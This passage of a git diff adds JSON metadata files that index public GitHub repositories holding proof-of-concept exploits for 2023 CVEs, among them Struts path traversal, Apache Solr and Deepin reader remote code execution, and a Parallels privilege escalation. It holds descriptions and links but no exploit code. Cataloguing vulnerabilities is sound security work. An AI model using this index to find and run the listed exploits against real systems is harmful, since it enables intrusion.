+ "html_url": "https:\/\/github.com\/AsfandAliMemon25\/CVE-2023-50164Analysis-",
+ "description": "CVE-2023-50164 An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.",
+ "fork": false,
+ "created_at": "2024-04-16T16:20:04Z",
+ "updated_at": "2024-04-24T12:11:57Z",
+ "pushed_at": "2024-04-16T17:09:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "dockerfile",
+ "exploit",
+ "vulnerability",
+ "webapplications"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50226.json b/2023/CVE-2023-50226.json
new file mode 100644
index 0000000000..37a48cb3ce
--- /dev/null
+++ b/2023/CVE-2023-50226.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711137981,
+ "name": "parallels-file-move-privesc",
+ "full_name": "kn32\/parallels-file-move-privesc",
+ "owner": {
+ "login": "kn32",
+ "id": 105210950,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4",
+ "html_url": "https:\/\/github.com\/kn32"
+ },
+ "html_url": "https:\/\/github.com\/kn32\/parallels-file-move-privesc",
+ "description": "Parallels Desktop privilege escalation - CVE-2023-50226 \/ ZDI-CAN-21227",
+ "fork": false,
+ "created_at": "2023-10-28T10:29:53Z",
+ "updated_at": "2024-01-30T20:34:52Z",
+ "pushed_at": "2023-12-31T08:48:26Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5024.json b/2023/CVE-2023-5024.json
new file mode 100644
index 0000000000..3562857f2b
--- /dev/null
+++ b/2023/CVE-2023-5024.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697093590,
+ "name": "CVE-2023-5024",
+ "full_name": "PH03N1XSP\/CVE-2023-5024",
+ "owner": {
+ "login": "PH03N1XSP",
+ "id": 22360364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22360364?v=4",
+ "html_url": "https:\/\/github.com\/PH03N1XSP"
+ },
+ "html_url": "https:\/\/github.com\/PH03N1XSP\/CVE-2023-5024",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-27T03:28:02Z",
+ "updated_at": "2023-09-27T03:28:03Z",
+ "pushed_at": "2023-09-27T03:46:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50254.json b/2023/CVE-2023-50254.json
new file mode 100644
index 0000000000..7ec2917091
--- /dev/null
+++ b/2023/CVE-2023-50254.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 734620925,
+ "name": "deepin-linux_reader_RCE-exploit",
+ "full_name": "febinrev\/deepin-linux_reader_RCE-exploit",
+ "owner": {
+ "login": "febinrev",
+ "id": 52229330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4",
+ "html_url": "https:\/\/github.com\/febinrev"
+ },
+ "html_url": "https:\/\/github.com\/febinrev\/deepin-linux_reader_RCE-exploit",
+ "description": "CVE-2023-50254: PoC Exploit for Deepin-reader RCE that affects unpatched Deepin Linux Desktops. Deepin Linux's default document reader \"deepin-reader\" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.",
+ "fork": false,
+ "created_at": "2023-12-22T06:50:28Z",
+ "updated_at": "2024-01-03T15:10:07Z",
+ "pushed_at": "2023-12-22T06:59:34Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50386.json b/2023/CVE-2023-50386.json
new file mode 100644
index 0000000000..8dce8f5620
--- /dev/null
+++ b/2023/CVE-2023-50386.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765085923,
+ "name": "Apache-Solr-RCE_CVE-2023-50386_POC",
+ "full_name": "vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC",
+ "owner": {
+ "login": "vvmdx",
+ "id": 75788310,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75788310?v=4",
+ "html_url": "https:\/\/github.com\/vvmdx"
+ },
+ "html_url": "https:\/\/github.com\/vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC",
+ "description": "Apache Solr Backup\/Restore APIs RCE Poc (CVE-2023-50386)",
+ "fork": false,
+ "created_at": "2024-02-29T08:57:47Z",
+ "updated_at": "2024-06-20T07:56:13Z",
+ "pushed_at": "2024-02-29T12:54:56Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50387.json b/2023/CVE-2023-50387.json
new file mode 100644
index 0000000000..28e6bec521
--- /dev/null
+++ b/2023/CVE-2023-50387.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 759552298,
+ "name": "CVE-2023-50387",
+ "full_name": "knqyf263\/CVE-2023-50387",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/CVE-2023-50387",
+ "description": "KeyTrap (DNSSEC)",
+ "fork": false,
+ "created_at": "2024-02-18T21:50:04Z",
+ "updated_at": "2024-05-21T09:30:40Z",
+ "pushed_at": "2024-02-18T22:15:14Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 804928080,
+ "name": "SSR-DNSSEC",
+ "full_name": "Meirelez\/SSR-DNSSEC",
+ "owner": {
+ "login": "Meirelez",
+ "id": 131269269,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131269269?v=4",
+ "html_url": "https:\/\/github.com\/Meirelez"
+ },
+ "html_url": "https:\/\/github.com\/Meirelez\/SSR-DNSSEC",
+ "description": "In this repository you can find the files used to try to produce a POC for the CVE-2023-50387",
+ "fork": false,
+ "created_at": "2024-05-23T14:41:50Z",
+ "updated_at": "2024-05-23T19:29:12Z",
+ "pushed_at": "2024-05-23T19:29:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5043.json b/2023/CVE-2023-5043.json
new file mode 100644
index 0000000000..51a308c48c
--- /dev/null
+++ b/2023/CVE-2023-5043.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 743454639,
+ "name": "CVE-2023-5043",
+ "full_name": "r0binak\/CVE-2023-5043",
+ "owner": {
+ "login": "r0binak",
+ "id": 80983900,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4",
+ "html_url": "https:\/\/github.com\/r0binak"
+ },
+ "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5043",
+ "description": "PoC CVE-2023-5043",
+ "fork": false,
+ "created_at": "2024-01-15T09:20:35Z",
+ "updated_at": "2024-01-15T09:27:28Z",
+ "pushed_at": "2024-01-15T09:25:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "kubernetes",
+ "nginx",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5044.json b/2023/CVE-2023-5044.json
new file mode 100644
index 0000000000..ea6982e44f
--- /dev/null
+++ b/2023/CVE-2023-5044.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 711804243,
+ "name": "CVE-2023-5044",
+ "full_name": "r0binak\/CVE-2023-5044",
+ "owner": {
+ "login": "r0binak",
+ "id": 80983900,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4",
+ "html_url": "https:\/\/github.com\/r0binak"
+ },
+ "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5044",
+ "description": "PoC CVE-2023-5044",
+ "fork": false,
+ "created_at": "2023-10-30T07:59:11Z",
+ "updated_at": "2024-01-15T02:36:46Z",
+ "pushed_at": "2023-12-30T18:10:00Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "kubernetes",
+ "nginx"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 744551896,
+ "name": "cve-2023-5044",
+ "full_name": "4ARMED\/cve-2023-5044",
+ "owner": {
+ "login": "4ARMED",
+ "id": 5612667,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5612667?v=4",
+ "html_url": "https:\/\/github.com\/4ARMED"
+ },
+ "html_url": "https:\/\/github.com\/4ARMED\/cve-2023-5044",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-17T14:32:54Z",
+ "updated_at": "2024-01-31T02:18:13Z",
+ "pushed_at": "2024-01-29T21:36:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 779402262,
+ "name": "CVE-2023-5044",
+ "full_name": "KubernetesBachelor\/CVE-2023-5044",
+ "owner": {
+ "login": "KubernetesBachelor",
+ "id": 162622196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4",
+ "html_url": "https:\/\/github.com\/KubernetesBachelor"
+ },
+ "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2023-5044",
+ "description": "Poc for CVE 2023 5044",
+ "fork": false,
+ "created_at": "2024-03-29T18:53:50Z",
+ "updated_at": "2024-03-30T13:41:43Z",
+ "pushed_at": "2024-04-11T07:15:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50465.json b/2023/CVE-2023-50465.json
new file mode 100644
index 0000000000..346d457f8c
--- /dev/null
+++ b/2023/CVE-2023-50465.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700635443,
+ "name": "CVE-2023-50465",
+ "full_name": "Ev3rR3d\/CVE-2023-50465",
+ "owner": {
+ "login": "Ev3rR3d",
+ "id": 108440914,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108440914?v=4",
+ "html_url": "https:\/\/github.com\/Ev3rR3d"
+ },
+ "html_url": "https:\/\/github.com\/Ev3rR3d\/CVE-2023-50465",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-05T01:36:08Z",
+ "updated_at": "2024-01-20T04:15:54Z",
+ "pushed_at": "2023-10-05T01:41:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50596.json b/2023/CVE-2023-50596.json
new file mode 100644
index 0000000000..5f309eee8a
--- /dev/null
+++ b/2023/CVE-2023-50596.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 734100171,
+ "name": "CVE-2023-50596",
+ "full_name": "chandraprarikraj\/CVE-2023-50596",
+ "owner": {
+ "login": "chandraprarikraj",
+ "id": 154472358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4",
+ "html_url": "https:\/\/github.com\/chandraprarikraj"
+ },
+ "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-50596",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-20T21:43:28Z",
+ "updated_at": "2023-12-20T21:43:28Z",
+ "pushed_at": "2023-12-20T21:44:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50643.json b/2023/CVE-2023-50643.json
new file mode 100644
index 0000000000..219d4da84f
--- /dev/null
+++ b/2023/CVE-2023-50643.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 729209972,
+ "name": "CVE-2023-50643",
+ "full_name": "giovannipajeu1\/CVE-2023-50643",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2023-50643",
+ "description": "CVE-2023-50643",
+ "fork": false,
+ "created_at": "2023-12-08T16:37:16Z",
+ "updated_at": "2024-06-11T18:01:05Z",
+ "pushed_at": "2023-12-15T21:06:14Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50685.json b/2023/CVE-2023-50685.json
new file mode 100644
index 0000000000..97a80bcd88
--- /dev/null
+++ b/2023/CVE-2023-50685.json
@@ -0,0 +1,42 @@
+[
+ {
+ "id": 729822594,
+ "name": "Hipcam-RTSP-Format-Validation-Vulnerability",
+ "full_name": "UnderwaterCoder\/Hipcam-RTSP-Format-Validation-Vulnerability",
+ "owner": {
+ "login": "UnderwaterCoder",
+ "id": 62648617,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62648617?v=4",
+ "html_url": "https:\/\/github.com\/UnderwaterCoder"
+ },
+ "html_url": "https:\/\/github.com\/UnderwaterCoder\/Hipcam-RTSP-Format-Validation-Vulnerability",
+ "description": "This POC exploits a format validation vulnerability in the RTSP service of the Hipcam RealServer\/V1.0, inducing a crash for approximately 45 seconds by injecting random data into the 'client_port' parameter during the RTSP SETUP request. Hipcam RealServer\/V1.0 is used in many Hipcam Cameras. | CVE-2023-50685",
+ "fork": false,
+ "created_at": "2023-12-10T13:21:43Z",
+ "updated_at": "2024-05-02T14:40:08Z",
+ "pushed_at": "2024-05-02T14:40:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "camera",
+ "crash",
+ "exploit",
+ "format-validation",
+ "hipcam",
+ "poc",
+ "proof-of-concept",
+ "rtsp",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5070.json b/2023/CVE-2023-5070.json
new file mode 100644
index 0000000000..b05a279da8
--- /dev/null
+++ b/2023/CVE-2023-5070.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706058561,
+ "name": "CVE-2023-5070",
+ "full_name": "RandomRobbieBF\/CVE-2023-5070",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5070",
+ "description": "Social Media Share Buttons & Social Sharing Icons <= 2.8.5 - Information Exposure",
+ "fork": false,
+ "created_at": "2023-10-17T08:19:09Z",
+ "updated_at": "2023-11-13T00:42:19Z",
+ "pushed_at": "2023-10-17T08:23:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50868.json b/2023/CVE-2023-50868.json
new file mode 100644
index 0000000000..cbc6c4c174
--- /dev/null
+++ b/2023/CVE-2023-50868.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774480851,
+ "name": "NSEC3-Encloser-Attack",
+ "full_name": "Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack",
+ "owner": {
+ "login": "Goethe-Universitat-Cybersecurity",
+ "id": 163991309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163991309?v=4",
+ "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity"
+ },
+ "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack",
+ "description": "This project generates DNS zonefiles with custom NSEC3 parameters to reproduce and evaluate the attacks in CVE-2023-50868.",
+ "fork": false,
+ "created_at": "2024-03-19T16:13:14Z",
+ "updated_at": "2024-06-16T14:58:40Z",
+ "pushed_at": "2024-05-27T12:07:49Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5089.json b/2023/CVE-2023-5089.json
new file mode 100644
index 0000000000..581cfea11f
--- /dev/null
+++ b/2023/CVE-2023-5089.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 805244897,
+ "name": "CVE-2023-5089",
+ "full_name": "Cappricio-Securities\/CVE-2023-5089",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-5089",
+ "description": "Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)",
+ "fork": false,
+ "created_at": "2024-05-24T07:14:55Z",
+ "updated_at": "2024-06-24T08:44:07Z",
+ "pushed_at": "2024-06-24T08:42:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-5089",
+ "pentesting",
+ "wapt",
+ "wordpress",
+ "xss"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-50917.json b/2023/CVE-2023-50917.json
new file mode 100644
index 0000000000..a79108b239
--- /dev/null
+++ b/2023/CVE-2023-50917.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711386901,
+ "name": "CVE-2023-50917",
+ "full_name": "Chocapikk\/CVE-2023-50917",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-50917",
+ "description": "MajorDoMo Unauthenticated RCE: Deep Dive & Exploitation Techniques",
+ "fork": false,
+ "created_at": "2023-10-29T05:10:09Z",
+ "updated_at": "2024-02-22T03:00:19Z",
+ "pushed_at": "2023-12-18T01:15:30Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51000.json b/2023/CVE-2023-51000.json
new file mode 100644
index 0000000000..a55de9095e
--- /dev/null
+++ b/2023/CVE-2023-51000.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 756306550,
+ "name": "CVE-2023-51000",
+ "full_name": "Team-Byerus\/CVE-2023-51000",
+ "owner": {
+ "login": "Team-Byerus",
+ "id": 156511157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156511157?v=4",
+ "html_url": "https:\/\/github.com\/Team-Byerus"
+ },
+ "html_url": "https:\/\/github.com\/Team-Byerus\/CVE-2023-51000",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-12T12:06:07Z",
+ "updated_at": "2024-02-12T12:06:08Z",
+ "pushed_at": "2024-02-12T12:06:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51073.json b/2023/CVE-2023-51073.json
new file mode 100644
index 0000000000..023cce5c5e
--- /dev/null
+++ b/2023/CVE-2023-51073.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 739242348,
+ "name": "CVE-2023-51073",
+ "full_name": "christopher-pace\/CVE-2023-51073",
+ "owner": {
+ "login": "christopher-pace",
+ "id": 22531478,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4",
+ "html_url": "https:\/\/github.com\/christopher-pace"
+ },
+ "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-51073",
+ "description": "Firmware Update Server Verification Vulnerability on Buffalo LS210D Version 1.78-0.03",
+ "fork": false,
+ "created_at": "2024-01-05T05:16:18Z",
+ "updated_at": "2024-01-07T02:12:37Z",
+ "pushed_at": "2024-01-07T01:40:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51119.json b/2023/CVE-2023-51119.json
new file mode 100644
index 0000000000..2eb3afd9f6
--- /dev/null
+++ b/2023/CVE-2023-51119.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 789571635,
+ "name": "CVE-2023-51119",
+ "full_name": "OscarAkaElvis\/CVE-2023-51119",
+ "owner": {
+ "login": "OscarAkaElvis",
+ "id": 5803348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5803348?v=4",
+ "html_url": "https:\/\/github.com\/OscarAkaElvis"
+ },
+ "html_url": "https:\/\/github.com\/OscarAkaElvis\/CVE-2023-51119",
+ "description": "Improper Access Control on D-Link DIR-605L router",
+ "fork": false,
+ "created_at": "2024-04-20T23:37:10Z",
+ "updated_at": "2024-04-20T23:42:02Z",
+ "pushed_at": "2024-04-20T23:41:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51126.json b/2023/CVE-2023-51126.json
new file mode 100644
index 0000000000..cec3cb14cb
--- /dev/null
+++ b/2023/CVE-2023-51126.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737937769,
+ "name": "CVE-2023-51126",
+ "full_name": "risuxx\/CVE-2023-51126",
+ "owner": {
+ "login": "risuxx",
+ "id": 47944560,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4",
+ "html_url": "https:\/\/github.com\/risuxx"
+ },
+ "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51126",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-02T02:31:06Z",
+ "updated_at": "2024-01-03T14:30:50Z",
+ "pushed_at": "2024-01-02T02:38:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51127.json b/2023/CVE-2023-51127.json
new file mode 100644
index 0000000000..3ccf0a3368
--- /dev/null
+++ b/2023/CVE-2023-51127.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737940013,
+ "name": "CVE-2023-51127",
+ "full_name": "risuxx\/CVE-2023-51127",
+ "owner": {
+ "login": "risuxx",
+ "id": 47944560,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4",
+ "html_url": "https:\/\/github.com\/risuxx"
+ },
+ "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51127",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-02T02:43:09Z",
+ "updated_at": "2024-01-03T14:30:37Z",
+ "pushed_at": "2024-01-02T02:46:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51214.json b/2023/CVE-2023-51214.json
new file mode 100644
index 0000000000..5e3fb6cab7
--- /dev/null
+++ b/2023/CVE-2023-51214.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 734095645,
+ "name": "CVE-2023-51214",
+ "full_name": "chandraprarikraj\/CVE-2023-51214",
+ "owner": {
+ "login": "chandraprarikraj",
+ "id": 154472358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4",
+ "html_url": "https:\/\/github.com\/chandraprarikraj"
+ },
+ "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-51214",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-20T21:23:33Z",
+ "updated_at": "2023-12-20T21:23:34Z",
+ "pushed_at": "2023-12-20T21:35:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51281.json b/2023/CVE-2023-51281.json
new file mode 100644
index 0000000000..2b8f139a2c
--- /dev/null
+++ b/2023/CVE-2023-51281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 734782806,
+ "name": "CVE-2023-51281",
